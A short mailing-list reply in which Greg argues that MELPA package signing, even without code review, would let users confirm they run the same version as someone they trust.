Tim, > I think you missed my point. There is no benefit in MELPA adopting > signed packages because there is no formal code review and no vetting > of the individuals who submit the code.
it occurs to me there might be one benefit: if George, whom you trust, says, "I've been running version 1.2.3 of package xYandZ from MELPA and i have a lot of confidence in it", then if you find that version of that package with a trusted MELPA signature, you maybe know that you and George are running the same software. i.e., it helps with the "web of trust" (if people still talk of that). (so, the requirement for this is not audited packages, but a solid, "secure", release procedure by MELPA.) cheers, Greg
